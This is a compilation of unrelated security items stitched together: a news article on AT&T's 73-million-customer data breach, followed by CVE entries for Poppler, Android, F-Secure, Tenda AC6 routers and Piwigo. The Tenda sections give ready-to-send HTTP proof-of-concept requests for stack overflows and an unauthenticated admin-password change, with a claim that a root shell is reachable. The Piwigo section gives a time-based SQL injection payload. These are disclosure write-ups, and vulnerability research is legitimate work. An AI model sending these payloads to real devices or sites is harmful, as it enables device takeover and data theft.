Telecommunications giant AT&T has finally confirmed that 73 million current and former customers are caught up in a massive dark web data leak.

Telecommunications giant AT&T has finally confirmed that 73 million current and former customers have been caught up in a massive dark web data leak. The leaked data includes names, addresses, mobile phone numbers, dates of birth, and social security numbers.

Malwarebytes VP of Consumer Privacy, Oren Arar, describes the AT&T breach as “especially risky” because much of the type of data that’s been exposed. “SSN, name, date of birth—this is personal identifiable information (PII) that cannot be changed, and if scammers gets their hands on it, it just makes their work in stealing peoples identities a lot easier.”

The data came to light a few weeks ago when it was put up for sale on an online cybercrime forum, but the seller, a hacker calling themselves “MajorNelson”, claimed it had been stolen from AT&T three years prior.

In 2021, a hacker named “Shiny Hunters” put a database apparently containing the personal details of 70 million AT&T customers up for sale, but AT&T denied the leak was its data, and denied it again when the data appeared on the dark web last month. It has since revised its position as it wrestles with the thorny problem of investigating what happened on its computers three years ago.

In its latest statement, the company confirmed that the leak contained “AT&T data-specific fields,” but said it had not yet determined the source of that data.

> AT&T has determined that AT&T data-specific fields were contained in a data set released on the dark web approximately two weeks ago. While AT&T has made this determination, it is not yet known whether the data in those fields originated from AT&T or one of its vendors. With respect to the balance of the data set, which includes personal information such as social security numbers, the source of the data is still being assessed.

However, it also said that it believes that the leak affects 7.6 million current customers, and the leaked data is “from 2019 or earlier”.

> Based on our preliminary analysis, the data set appears to be from 2019 or earlier, impacting approximately 7.6 million current AT&T account holders and approximately 65.4 million former account holders.

In a separate statement, the company also said it is reaching out to the people affected by the breach.

> It has come to our attention that a number of AT&T passcodes have been compromised. We are reaching out to all 7.6M impacted customers and have reset their passcodes. In addition, we will be communicating with current and former account holders with compromised sensitive personal information.

Personal information like names, addresses, phone numbers, passcodes, and social security numbers are prized assets for cybercriminals because they can be used to make scams much more believable.

In particular, this information will make it easier for criminals to pose as AT&T, and all 73 million people affected by this breach will need to be on their guard for scammers using it as a pretext to send personalised, AT&T-branded emails and messages.

**Protecting yourself from a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Check if your data has been breached**

Our Digital Footprint records now include the AT&T data so you can check if your information has been exposed online. Submit your email address (it’s best to submit the one you use most frequently) to our free Digital Footprint scan and we’ll send you a report.

 AT&#038;T confirms 73 million people affected by data breach 

CVE-2021-24565

A reachable Object::dictLookup assertion in Poppler 0.72.0 allows attackers to cause a denial of service due to the lack of a check for the dict data type, as demonstrated by use of the FileSpec class (in FileSpec.cc) in pdfdetach.

Version: latest compiled version from git repo

Command: pdfdetach -save 1 abort2.pdf

Backtrace:

    Internal Error (0): Call to Object where the object was type 3, not the expected type 7
    
    Breakpoint 2, __GI_abort () at abort.c:51
    51      abort.c: No such file or directory.
    (gdb) bt
    #0  __GI_abort () at abort.c:51
    #1  0x0814e543 in Object::dictLookup (key=0x8611060 "Desc", this=0xf3f02854, this=0xf3f02854, recursion=0) at /work/poppler/poppler/Object.h:369
    #2  0x0814fab2 in FileSpec::FileSpec (this=0xf3f02850, fileSpecA=0xf5b06ef4) at /work/poppler/poppler/FileSpec.cc:138
    #3  0x08115ac4 in main (argc=2, argv=0xffffd7a4) at /work/poppler/utils/pdfdetach.cc:180
    (gdb) list FileSpec.cc:138
    133             return;
    134           }
    135         }
    136       }
    137
    138       obj1 = fileSpec.dictLookup("Desc");
    139       if (obj1.isString())
    140         desc = obj1.getString()->copy();
    141     }
    142
    

The pdf file is attached here. reachabort2.pdf

CVE-2018-20650: a reachable abort in FileSpec::FileSpec in FileSpec.cc (#704) · Issues · poppler / poppler · GitLab

In visitUris of Notification.java, there is a possible way to reveal image contents from another user due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.

)\]}' { "commit": "cb6282e8970f4c9db5497889699e68fb2038566e", "tree": "974ae991a39967eee17120b12758de2b2c0f2303", "parents": \[ "7a5e51c918b7097be3c7e669e1825a4d159c4185" \], "author": { "name": "Ioana Alexandru", "email": "aioana@google.com", "time": "Thu Apr 27 14:55:28 2023 +0000" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Thu Jun 08 20:33:40 2023 +0000" }, "message": "Verify URI permissions for notification shortcutIcon.\\n\\nBug: 277593270\\nTest: atest NotificationManagerServiceTest\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:936b58b12851269b878b44cc8df790b3afe9c3f5)\\nMerged-In: Iaf2a9a82f18e018e60e6cdc020da6ebf7267e8b1\\nChange-Id: Iaf2a9a82f18e018e60e6cdc020da6ebf7267e8b1\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "b3921fe8bd79c6c799609cb1419fd291e6094aee", "old\_mode": 33188, "old\_path": "core/java/android/app/Notification.java", "new\_id": "034192ddcecec7487e8764a22915a7e99a218055", "new\_mode": 33188, "new\_path": "core/java/android/app/Notification.java" }, { "type": "modify", "old\_id": "cc0bc24fc660f325b85405f105f5b7ed7f8e7b49", "old\_mode": 33261, "old\_path": "services/tests/uiservicestests/src/com/android/server/notification/NotificationManagerServiceTest.java", "new\_id": "689691b749a3f0f67101637f657563c18a55c647", "new\_mode": 33261, "new\_path": "services/tests/uiservicestests/src/com/android/server/notification/NotificationManagerServiceTest.java" } \] }

CVE-2023-21291

A vulnerability affecting F-Secure SAFE browser was discovered. A maliciously crafted website could make a phishing attack with address bar spoofing as the address bar was not correct if navigation fails.

**Security Advisories**

**CVE-2022-28870: Address Bar Spoofing Vulnerability in F-Secure SAFE Browser for Android**

**Description**

Showing old URL in case navigation to new URL fails could lead to address bar spoofing.

**STATUS:** Fixed  

**RISK LEVEL:** Medium

**FIX:** A fix has been released in the automatic update channel since 13th, April, 2022. No user action is required.

**Affected Products**

*   F-Secure SAFE Browser for Android Version 18.6 and below.

**Platforms**

*   All supported platforms of the affected products

**More Information**

A vulnerability affecting F-Secure SAFE browser was discovered. A maliciously crafted website could make a phishing attack with address bar spoofing as the address bar was not correct if navigation fails.  

This issue was reported to F-Secure through the Vulnerability Reward Program. No known exploit or attack has been seen in the wild.

**Credits**

F-Secure Corporation would like to thank Kirtikumar Anandrao Ramchandani for bringing this issue to our attention.

CVE-2022-28870: CVE-2022-28870 | F-Secure

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function.

**Tenda AC6 V15.03.05.09\_multi Unauthorized stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220215174142153](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215174142153.png)

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details****2.1Arbitrary password modification vulnerability**

![image-20220215175103625](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215175103625.png)

![image-20220215175441246](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215175441246.png)

![image-20220215175631393](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215175631393.png)

Firstly, through reverse analysis, we can find that there is a vulnerability of arbitrary password modification in the interface.The program passes the contents obtained in the loginpwd parameter directly to V16, and then directly changes the password to the login password through the setvalue() function. In this way, we can change the management password without authorization.

**2.2Stack overflow vulnerability**

![image-20220217155029627](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220217155029627.png)

The content obtained by the program through the parameter endip is passed to v19

![image-20220217155045633](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220217155045633.png)

Then, through sscanf function and regular expression, the matched content is formatted into the stack of V9, V10, V11 and V12. There is no size check, so there is a stack overflow vulnerability.

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.05.09\_multi
2.  Attack with the following overflow POC attacks

    POST /goform/SetPptpServerCfg HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1564
    Origin: http://192.168.1.1
    Connection: close
    Referer: http://192.168.1.1/pptp_server.html?random=0.039770115229594394&
    Cookie: password=e10adc3949ba59abbe56e057f20f883eepe1qw
    
    serverEn=1&startIp=10.0.0.100&endIp=10.0.0.200aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae&mppe=0&mppeOp=128
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220214114614959.png)

Figure 2 POC attack effect

3.Unauthorized password rewriting POC（The password here is changed to 123456）

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 116
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/index.html
    
    ssid=Tenda_AC6_rencvn&wrlPassword=rencvn667&power=high&timeZone=%2B08%3A00&loginPwd=e10adc3949ba59abbe56e057f20f883e
    

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell without authorization

![image-20220215180128600](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215180128600.png)

CVE-2022-25460: IOT_vuln/Tenda/AC6/17 at main · EPhaha/IOT_vuln

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.

**Tenda AC6 V15.03.05.09\_multi Unauthorized stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220215174142153](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215174142153.png)

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details****2.1Arbitrary password modification vulnerability**

![image-20220215175103625](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215175103625.png)

![image-20220215175441246](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215175441246.png)

![image-20220215175631393](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215175631393.png)

Firstly, through reverse analysis, we can find that there is a vulnerability of arbitrary password modification in the interface.The program passes the contents obtained in the loginpwd parameter directly to V16, and then directly changes the password to the login password through the setvalue() function. In this way, we can change the management password without authorization.

**2.2Stack overflow vulnerability**

![image-20220215181224260](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215181224260.png)

![image-20220215181229759](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215181229759.png)

The program passes the parameters obtained from schedendtime to V20, and then directly copies V20 on the stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.05.09\_multi
2.  Attack with the following overflow POC attacks

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1602
    Origin: http://192.168.1.1
    Connection: close
    Referer: http://192.168.1.1/wifi_time.html?random=0.2685288037929373&
    Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbchrb1qw
    
    schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=01%3A00aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae&timeType=0&day=1%2C1%2C1%2C1%2C1%2C1%2C1
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220214114614959.png)

Figure 2 POC attack effect

3.Unauthorized password rewriting POC（The password here is changed to 123456）

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 116
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/index.html
    
    ssid=Tenda_AC6_rencvn&wrlPassword=rencvn667&power=high&timeZone=%2B08%3A00&loginPwd=e10adc3949ba59abbe56e057f20f883e
    

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell without authorization

![image-20220215180128600](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215180128600.png)

CVE-2022-25447: IOT_vuln/Tenda/AC6/4 at main · EPhaha/IOT_vuln

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function.

**Tenda AC6 V15.03.05.09\_multi Unauthorized stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220215174142153](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215174142153.png)

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details****2.1Arbitrary password modification vulnerability**

![image-20220215175103625](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215175103625.png)

![image-20220215175441246](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215175441246.png)

![image-20220215175631393](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215175631393.png)

Firstly, through reverse analysis, we can find that there is a vulnerability of arbitrary password modification in the interface.The program passes the contents obtained in the loginpwd parameter directly to V16, and then directly changes the password to the login password through the setvalue() function. In this way, we can change the management password without authorization.

**2.2Stack overflow vulnerability**

![image-20220217154910431](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220217154910431.png)

The content obtained by the program through the parameter startip is passed to V20

![image-20220217154921233](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220217154921233.png)

Then, through sscanf function, the content of regular expression matching is passed to the stack of V13, V14 and V15. There is no size check, and there is a stack overflow vulnerability.

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.05.09\_multi
2.  Attack with the following overflow POC attacks

    POST /goform/SetPptpServerCfg HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1564
    Origin: http://192.168.1.1
    Connection: close
    Referer: http://192.168.1.1/pptp_server.html?random=0.039770115229594394&
    Cookie: password=e10adc3949ba59abbe56e057f20f883eepe1qw
    
    serverEn=1&startIp=10.0.0.100aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae&endIp=10.0.0.200&mppe=0&mppeOp=128
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220214114614959.png)

Figure 2 POC attack effect

3.Unauthorized password rewriting POC（The password here is changed to 123456）

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 116
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/index.html
    
    ssid=Tenda_AC6_rencvn&wrlPassword=rencvn667&power=high&timeZone=%2B08%3A00&loginPwd=e10adc3949ba59abbe56e057f20f883e
    

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell without authorization

![image-20220215180128600](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215180128600.png)

CVE-2022-25461: IOT_vuln/Tenda/AC6/16 at main · EPhaha/IOT_vuln

Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.

**Vulnerability details**

**vulnerability type:** SQL injection

**vulnerability versions:** piwigo 12.2.0

**vulnerability Url:** http://10.92.66.148/piwigo/ws.php?format=json&method=pwg.users.getList

**SQL injected fields exist**：**order**

**verification procedure**

log on to the system and go user-Management-user list ![image.png](https://camo.githubusercontent.com/7618a048d3671fcbb2d5481eae2fb091c0f33102d22bd2546ede3e9736fa0672/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639343334393631322d34386264316531362d326138362d343736352d383636302d6364343963626535646136332e706e6723636c69656e7449643d7531356164323763632d663565312d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3635372669643d753164313432666131266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d363537266f726967696e57696474683d31393230266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d3838303330267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7530396365373333382d386432302d346363392d396339652d6239366538376562623631267469746c653d2677696474683d31393230) Vulnerability Data：

POST /piwigo/ws.php?format\=json&method\=pwg.users.getList HTTP/1.1
Host: 10.92.66.148
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://10.92.66.148
Connection: close
Referer: http://10.92.66.148/piwigo/admin.php?page=user\_list
Cookie: pwg\_id=pkl5bk0ifq21ss8nb2j126u55j; pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_album\_manager\_view=tile; pwg\_plugin\_manager\_view=classic; pwg\_user\_manager\_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64
display=all&order=(select\*from(select+sleep(5)union/\*\*/select+1)a)&page\=0&per\_page\=5&exclude%5B%5D\=2

Modify the exclude\[\] field and use Sleep(5) to execute SQL statements with a delay of 5 seconds. As shown in the following figure, data is returned with a delay of 5 seconds, proving that SQL injection exists: ![image.png](https://camo.githubusercontent.com/747140c17631012594a721564ae93010905ddf5727c1b2e94a005d440161fb92/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639353038333736332d65653863386663392d383936642d343735632d383431382d3962666464623338663737362e706e6723636c69656e7449643d7562353665386430332d643537352d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3936332669643d753936396431643166266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d393633266f726967696e57696474683d31393230266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d313936353836267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7561376466356438662d376539322d343834372d396235662d3863633436646561633738267469746c653d2677696474683d31393230) Use SQLmap to verify vulnerabilities. Data packets are marked as injection points:

POST /piwigo/ws.php?format\=json&method\=pwg.users.getList HTTP/1.1
Host: 10.92.66.148
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://10.92.66.148
Connection: close
Referer: http://10.92.66.148/piwigo/admin.php?page=user\_list
Cookie: pwg\_id=pkl5bk0ifq21ss8nb2j126u55j; pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_album\_manager\_view=tile; pwg\_plugin\_manager\_view=classic; pwg\_user\_manager\_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64
display=all&order=\*&page=0&per\_page=5&exclude%5B%5D=2

